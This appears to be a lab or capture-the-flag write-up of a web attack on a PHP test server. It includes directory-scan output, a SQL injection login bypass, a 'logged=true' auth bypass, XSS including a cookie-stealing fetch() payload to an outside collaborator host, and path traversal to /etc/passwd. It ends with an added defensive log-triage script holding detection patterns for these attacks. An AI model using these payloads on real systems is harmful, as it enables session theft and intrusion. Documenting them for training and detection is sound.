# Attack

## Web recon

```
[13:51:30] 403 - 279B - /.ht_wsr.txt
[13:51:30] 403 - 279B - /.htaccess.bak1
[13:51:30] 403 - 279B - /.htaccess.orig
[13:51:30] 403 - 279B - /.htaccess.sample
[13:51:30] 403 - 279B - /.htaccess_orig
[13:51:30] 403 - 279B - /.htaccess.save
[13:51:30] 403 - 279B - /.htaccessBAK
[13:51:30] 403 - 279B - /.htaccess_extra
[13:51:30] 403 - 279B - /.htaccess_sc
[13:51:30] 403 - 279B - /.htaccessOLD
[13:51:30] 403 - 279B - /.htaccessOLD2
[13:51:30] 403 - 279B - /.htm
[13:51:30] 403 - 279B - /.html
[13:51:30] 403 - 279B - /.htpasswd_test
[13:51:30] 403 - 279B - /.htpasswds
[13:51:30] 403 - 279B - /.httr-oauth
[13:51:31] 403 - 279B - /.php
[13:51:43] 200 - 254B - /index.php
[13:51:43] 200 - 254B - /index.php/login/
[13:51:47] 200 - 13KB - /phpmyadmin/doc/html/index.html
[13:51:47] 301 - 319B - /phpmyadmin -> http://172.17.37.92/phpmyadmin/
[13:51:48] 200 - 92KB - /phpinfo.php
[13:51:48] 200 - 10KB - /phpmyadmin/
[13:51:48] 200 - 10KB - /phpmyadmin/index.php
[13:51:50] 403 - 279B - /server-status
[13:51:50] 403 - 279B - /server-status/
```

## 1. Web: SQLi

On the login page:

```
GET /phpserver/login.php?login=admin&password='%20or%20'z'%3d'z HTTP/1.1
Host: 172.17.37.92
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://172.17.37.92/phpserver/home.php
Cookie: PHPSESSID=ks6bi6th5dimjp5qp1kcuuiu15
Upgrade-Insecure-Requests: 1
```

Working payloads:

![](https://i.imgur.com/poTAGb0.png)

![](https://i.imgur.com/d4JXo1S.png)

![](https://i.imgur.com/Dj3fy4E.png)

## 2. Broken auth

![](https://i.imgur.com/ThIWYRz.png)

Added `logged=true`:

![](https://i.imgur.com/UroOlFS.png)

## 3. Web directory

![](https://i.imgur.com/8WJu9QN.png)

## 4. HTTP sniffer

![](https://i.imgur.com/pdwJmL8.png)

## XSS

http://172.17.37.92/phpserver/info.php?name=%3C/pre%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3Cpre%3E&logged=true#

![](https://i.imgur.com/mnU3CkI.png)

Cookie exfiltration, using:

http://172.17.37.92/phpserver/info.php?name=%3Cimg%20src=x%20onerror=fetch(%27//q1s731spl18jcfrrmfz9cmjmpdv5ju.burpcollaborator.net?c=%27%2Bdocument.cookie)%3E&logged=true#

![](https://i.imgur.com/RZZs9BK.png)

SQL credentials found.

![](https://i.imgur.com/UL2IVbE.png)

Logging in to phpMyAdmin:

![](https://i.imgur.com/IT4Vkgo.png)

We can see that the password is stored in cleartext, which is most unfortunate.

http://172.17.37.92/secretPath/secure.php?file=%3Cimg%20src=x%20onerror=alert(1)%3E

![](https://i.imgur.com/wmC44jH.png)

http://172.17.37.92/secretPath/secure.php?file=../../../../etc/passwd

![](https://i.imgur.com/yIZBgsD.png)

![](https://i.imgur.com/tTjcwMS.png)

Fuzzing all files:

![](https://i.imgur.com/QDJLKok.png)

![](https://i.imgur.com/t2TsfFT.png)

![](https://i.imgur.com/y0OxJvL.png)
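Seen from the defending side, every finding in this write-up leaves a distinctive trace in the web server's access log: the quoted `' or 'z'='z` login, the `onerror=` payload in `name`, the `../../../../etc/passwd` path in `file`, and the client-supplied `logged` flag the application trusts. The triage script below is an added example, not part of the original write-up; its log lines mirror the requests above, and the client IP, timestamps and response sizes are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache-style access-log lines mirroring the requests in this
# write-up; the client IP, timestamps and sizes are made up.
SAMPLE_LOG = """\
172.17.37.1 - - [01/Jan/2023:13:55:01 +0000] "GET /phpserver/login.php?login=admin&password='%20or%20'z'%3d'z HTTP/1.1" 200 254
172.17.37.1 - - [01/Jan/2023:13:56:12 +0000] "GET /phpserver/info.php?name=%3C/pre%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3Cpre%3E&logged=true HTTP/1.1" 200 512
172.17.37.1 - - [01/Jan/2023:13:57:40 +0000] "GET /secretPath/secure.php?file=../../../../etc/passwd HTTP/1.1" 200 2048
172.17.37.1 - - [01/Jan/2023:13:58:03 +0000] "GET /phpserver/info.php?name=alice HTTP/1.1" 200 300
""".splitlines()

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Value rules run against every decoded query-parameter value.
RULES = {
    "sqli": re.compile(r"'\s*(?:or|and)\s+\S+\s*=|'\s*--|/\*", re.I),
    "xss": re.compile(r"<\s*\w+|\bon\w+\s*=|javascript:", re.I),
    "traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd", re.I),
}
# Parameters this app treats as authentication state (see "Broken auth").
CLIENT_AUTH_PARAMS = {"logged"}

def classify_query(query):
    """Return the set of rule names triggered by a raw query string."""
    tags = set()
    for key, raw in parse_qsl(query, keep_blank_values=True):
        if key in CLIENT_AUTH_PARAMS:
            tags.add("client_auth_flag")
        value = unquote(raw)  # parse_qsl decoded once; again for double encoding
        for name, pattern in RULES.items():
            if pattern.search(value):
                tags.add(name)
    return tags

def triage(lines):
    """List (path, sorted tags) for every flagged request; benign lines are dropped."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        target = urlsplit(m.group("target")) if m else None
        tags = classify_query(target.query) if target else set()
        if tags:
            findings.append((target.path, sorted(tags)))
    return findings
```

The rules are deliberately narrow so the benign `name=alice` request is not flagged; a real deployment would also record the source IP and time of each hit for correlation with the `PHPSESSID` in use.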